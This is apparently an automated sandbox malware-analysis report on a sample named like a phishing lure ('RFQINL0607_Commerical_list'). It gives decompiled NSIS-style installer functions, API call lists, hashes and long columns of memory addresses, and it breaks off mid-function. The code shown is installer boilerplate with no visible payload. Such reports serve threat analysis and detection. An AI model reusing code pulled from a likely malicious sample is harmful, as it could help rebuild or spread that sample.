                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406e4a
                                                                                                                                                                                  0x00406e4a
                                                                                                                                                                                  0x00406e4d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406e3d
                                                                                                                                                                                  0x00406e40
                                                                                                                                                                                  0x00406e42
                                                                                                                                                                                  0x00406e46
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406e48
                                                                                                                                                                                  0x00406e48
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406e4a
                                                                                                                                                                                  0x00406e6e
                                                                                                                                                                                  0x00406e74
                                                                                                                                                                                  0x00406e7e
                                                                                                                                                                                  0x00406e80
                                                                                                                                                                                  0x00406e85
                                                                                                                                                                                  0x00406e87
                                                                                                                                                                                  0x00406ebd
                                                                                                                                                                                  0x00406e89
                                                                                                                                                                                  0x00406e89
                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                  0x00406e8f
                                                                                                                                                                                  0x00406e99
                                                                                                                                                                                  0x00406e9c
                                                                                                                                                                                  0x00406ea3
                                                                                                                                                                                  0x00406eae
                                                                                                                                                                                  0x00406eb5
                                                                                                                                                                                  0x00406eb5
                                                                                                                                                                                  0x00406ebf
                                                                                                                                                                                  0x00406ec2
                                                                                                                                                                                  0x00406ec4
                                                                                                                                                                                  0x00406eca
                                                                                                                                                                                  0x00406eca
                                                                                                                                                                                  0x00406ed3
                                                                                                                                                                                  0x00406ed6
                                                                                                                                                                                  0x00406edb
                                                                                                                                                                                  0x00406eea
                                                                                                                                                                                  0x00406ef2
                                                                                                                                                                                  0x00406ef7
                                                                                                                                                                                  0x00406f1b
                                                                                                                                                                                  0x00406f23
                                                                                                                                                                                  0x00406f27
                                                                                                                                                                                  0x00406f2d
                                                                                                                                                                                  0x00406ef9
                                                                                                                                                                                  0x00406f07
                                                                                                                                                                                  0x00406f0a
                                                                                                                                                                                  0x00406f10
                                                                                                                                                                                  0x00406f10
                                                                                                                                                                                  0x00406f31
                                                                                                                                                                                  0x00406eec
                                                                                                                                                                                  0x00406eec
                                                                                                                                                                                  0x00406eec
                                                                                                                                                                                  0x00406f42
                                                                                                                                                                                  0x00406f46
                                                                                                                                                                                  0x00406f52
                                                                                                                                                                                  0x00406f4d
                                                                                                                                                                                  0x00406f50
                                                                                                                                                                                  0x00406f50
                                                                                                                                                                                  0x00406f5a
                                                                                                                                                                                  0x00406f5f
                                                                                                                                                                                  0x00406f67
                                                                                                                                                                                  0x00406f63
                                                                                                                                                                                  0x00406f65
                                                                                                                                                                                  0x00406f65
                                                                                                                                                                                  0x00406f6d
                                                                                                                                                                                  0x00406f6f
                                                                                                                                                                                  0x00406f76
                                                                                                                                                                                  0x00406f80
                                                                                                                                                                                  0x00406f8a
                                                                                                                                                                                  0x00406fa6
                                                                                                                                                                                  0x00406faa
                                                                                                                                                                                  0x00406def
                                                                                                                                                                                  0x00406df5
                                                                                                                                                                                  0x00406df6
                                                                                                                                                                                  0x00406df8
                                                                                                                                                                                  0x00406dfe
                                                                                                                                                                                  0x00406e01
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406e01
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406f8c
                                                                                                                                                                                  0x00406f8c
                                                                                                                                                                                  0x00406f8c
                                                                                                                                                                                  0x00406f91
                                                                                                                                                                                  0x00406f9a
                                                                                                                                                                                  0x00406fa3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406fa3
                                                                                                                                                                                  0x00406fb0
                                                                                                                                                                                  0x00406fb0
                                                                                                                                                                                  0x00406fb3
                                                                                                                                                                                  0x00406fba
                                                                                                                                                                                  0x00406fbd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406de0
                                                                                                                                                                                  0x00406d60
                                                                                                                                                                                  0x00406d62
                                                                                                                                                                                  0x00406d62
                                                                                                                                                                                  0x00406d66
                                                                                                                                                                                  0x00406d69
                                                                                                                                                                                  0x00406d6a
                                                                                                                                                                                  0x00406d6a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406d62
                                                                                                                                                                                  0x00406cd6
                                                                                                                                                                                  0x00406cdc
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                                                                                                                                  • Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
                                                                                                                                                                                  • Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                                                                                                                                  • Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040405D Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 205windowstringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                                                  			E0040405D(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x428834 =  *0x428834 + 1;
								__eflags =  *0x428834;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F7B(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x42d3a0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									ShellExecuteA(_a4, "open", _v8, 0, 0, "true");
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42e408, 0x111, "true", 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42e408, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x428834; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t103 =  *0x429040; // 0x73b524
					_t25 = _t103 + 0x14; // 0x73b538
					_t112 = _t25;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E00403F36(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E004042E7();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x42dbdc; // 0x73cfd8
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x42e438;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E00404028;
					E00403F14(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E00403F14(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, "true");
					E00403F36( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E00403F49(_t99);
					SendMessageA(_t99, 0x45b, "true", 0);
					_t86 =  *( *0x42e410 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x428834 = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x428834 = 0;
					return 0;
				}
			}




















                                                                                                                                                                                  0x0040406d
                                                                                                                                                                                  0x0040417f
                                                                                                                                                                                  0x00404192
                                                                                                                                                                                  0x004041ee
                                                                                                                                                                                  0x004041ee
                                                                                                                                                                                  0x004041f2
                                                                                                                                                                                  0x004042c2
                                                                                                                                                                                  0x004042c9
                                                                                                                                                                                  0x004042cb
                                                                                                                                                                                  0x004042cb
                                                                                                                                                                                  0x004042cb
                                                                                                                                                                                  0x004042d1
                                                                                                                                                                                  0x004042d1
                                                                                                                                                                                  0x004042d4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004042db
                                                                                                                                                                                  0x00404200
                                                                                                                                                                                  0x00404202
                                                                                                                                                                                  0x00404205
                                                                                                                                                                                  0x0040420c
                                                                                                                                                                                  0x0040420e
                                                                                                                                                                                  0x00404215
                                                                                                                                                                                  0x00404217
                                                                                                                                                                                  0x0040421a
                                                                                                                                                                                  0x0040421d
                                                                                                                                                                                  0x00404222
                                                                                                                                                                                  0x00404228
                                                                                                                                                                                  0x0040422b
                                                                                                                                                                                  0x00404232
                                                                                                                                                                                  0x00404240
                                                                                                                                                                                  0x00404258
                                                                                                                                                                                  0x0040426b
                                                                                                                                                                                  0x0040427b
                                                                                                                                                                                  0x0040427d
                                                                                                                                                                                  0x0040427d
                                                                                                                                                                                  0x00404232
                                                                                                                                                                                  0x00404215
                                                                                                                                                                                  0x00404280
                                                                                                                                                                                  0x00404287
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404289
                                                                                                                                                                                  0x00404289
                                                                                                                                                                                  0x00404290
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404292
                                                                                                                                                                                  0x00404296
                                                                                                                                                                                  0x004042a7
                                                                                                                                                                                  0x004042a7
                                                                                                                                                                                  0x004042a9
                                                                                                                                                                                  0x004042ad
                                                                                                                                                                                  0x004042bb
                                                                                                                                                                                  0x004042bb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004042bf
                                                                                                                                                                                  0x00404287
                                                                                                                                                                                  0x0040419a
                                                                                                                                                                                  0x0040419d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004041a5
                                                                                                                                                                                  0x004041ab
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004041b1
                                                                                                                                                                                  0x004041b7
                                                                                                                                                                                  0x004041b7
                                                                                                                                                                                  0x004041ba
                                                                                                                                                                                  0x004041bd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004041e0
                                                                                                                                                                                  0x004041e0
                                                                                                                                                                                  0x004041e2
                                                                                                                                                                                  0x004041e4
                                                                                                                                                                                  0x004041e9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404073
                                                                                                                                                                                  0x00404073
                                                                                                                                                                                  0x00404076
                                                                                                                                                                                  0x0040407b
                                                                                                                                                                                  0x0040407d
                                                                                                                                                                                  0x0040408c
                                                                                                                                                                                  0x0040408c
                                                                                                                                                                                  0x00404093
                                                                                                                                                                                  0x00404096
                                                                                                                                                                                  0x00404098
                                                                                                                                                                                  0x0040409d
                                                                                                                                                                                  0x004040a6
                                                                                                                                                                                  0x004040ac
                                                                                                                                                                                  0x004040b8
                                                                                                                                                                                  0x004040bb
                                                                                                                                                                                  0x004040c4
                                                                                                                                                                                  0x004040c9
                                                                                                                                                                                  0x004040cc
                                                                                                                                                                                  0x004040d1
                                                                                                                                                                                  0x004040e8
                                                                                                                                                                                  0x004040ef
                                                                                                                                                                                  0x00404102
                                                                                                                                                                                  0x00404105
                                                                                                                                                                                  0x0040411a
                                                                                                                                                                                  0x00404121
                                                                                                                                                                                  0x00404126
                                                                                                                                                                                  0x0040412b
                                                                                                                                                                                  0x0040412b
                                                                                                                                                                                  0x0040413a
                                                                                                                                                                                  0x00404149
                                                                                                                                                                                  0x0040415b
                                                                                                                                                                                  0x00404160
                                                                                                                                                                                  0x00404170
                                                                                                                                                                                  0x00404172
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404178

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 004040E8
                                                                                                                                                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 0040411A
                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 0040412B
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040414C
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 004041D2
                                                                                                                                                                                  • SendMessageA.USER32(00000000), ref: 004041D5
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404200
                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00404258
                                                                                                                                                                                  • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,?), ref: 0040426B
                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404278
                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040427B
                                                                                                                                                                                  • SendMessageA.USER32(00000111,?,00000000), ref: 004042A7
                                                                                                                                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                  • String ID: (@@$Call$N$open
                                                                                                                                                                                  • API String ID: 3615053054-2228552488
                                                                                                                                                                                  • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                                                                                                                  • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42e410;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, "true");
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Baptistisk Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42e408;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                                                                                                                  0x0040100a
                                                                                                                                                                                  0x00401039
                                                                                                                                                                                  0x00401047
                                                                                                                                                                                  0x0040104d
                                                                                                                                                                                  0x00401051
                                                                                                                                                                                  0x0040105b
                                                                                                                                                                                  0x00401061
                                                                                                                                                                                  0x00401064
                                                                                                                                                                                  0x004010f3
                                                                                                                                                                                  0x00401089
                                                                                                                                                                                  0x0040108c
                                                                                                                                                                                  0x004010a6
                                                                                                                                                                                  0x004010bd
                                                                                                                                                                                  0x004010cc
                                                                                                                                                                                  0x004010cf
                                                                                                                                                                                  0x004010d5
                                                                                                                                                                                  0x004010d9
                                                                                                                                                                                  0x004010e4
                                                                                                                                                                                  0x004010ed
                                                                                                                                                                                  0x004010ef
                                                                                                                                                                                  0x004010ef
                                                                                                                                                                                  0x00401100
                                                                                                                                                                                  0x00401105
                                                                                                                                                                                  0x0040110d
                                                                                                                                                                                  0x00401110
                                                                                                                                                                                  0x00401112
                                                                                                                                                                                  0x00401118
                                                                                                                                                                                  0x0040111f
                                                                                                                                                                                  0x00401126
                                                                                                                                                                                  0x00401130
                                                                                                                                                                                  0x00401142
                                                                                                                                                                                  0x00401156
                                                                                                                                                                                  0x00401160
                                                                                                                                                                                  0x00401165
                                                                                                                                                                                  0x00401165
                                                                                                                                                                                  0x00401110
                                                                                                                                                                                  0x0040116e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00401178
                                                                                                                                                                                  0x00401010
                                                                                                                                                                                  0x00401013
                                                                                                                                                                                  0x00401015
                                                                                                                                                                                  0x0040101f
                                                                                                                                                                                  0x0040101f
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                  • DrawTextA.USER32(00000000,Baptistisk Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                  • String ID: Baptistisk Setup$F
                                                                                                                                                                                  • API String ID: 941294808-1275618213
                                                                                                                                                                                  • Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                                                                                                                                  • Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
                                                                                                                                                                                  • Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                                                                                                                                  • Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00405A78 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00405A78(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t13;
				long _t25;
				char* _t32;
				int _t38;
				void* _t39;
				intOrPtr* _t40;
				long _t43;
				CHAR* _t45;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t54;

				_t39 = __ecx;
				lstrcpyA(0x42b5f8, "NUL");
				_t45 =  *(_t53 + 0x18);
				if(_t45 == 0) {
					L3:
					_t13 = GetShortPathNameA( *(_t53 + 0x1c), 0x42b9f8, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						_t38 = wsprintfA(0x42b1f8, "%s=%s\r\n", 0x42b5f8, 0x42b9f8);
						_t54 = _t53 + 0x10;
						E00405D51(_t38, 0x42b5f8, 0x42b9f8, 0x42b9f8,  *((intOrPtr*)( *0x42e410 + 0x128)));
						_t13 = E004059A2(0x42b9f8, 0xc0000000, 4);
						_t49 = _t13;
						 *(_t54 + 0x18) = _t49;
						if(_t49 != 0xffffffff) {
							_t43 = GetFileSize(_t49, 0);
							_t6 = _t38 + 0xa; // 0xa
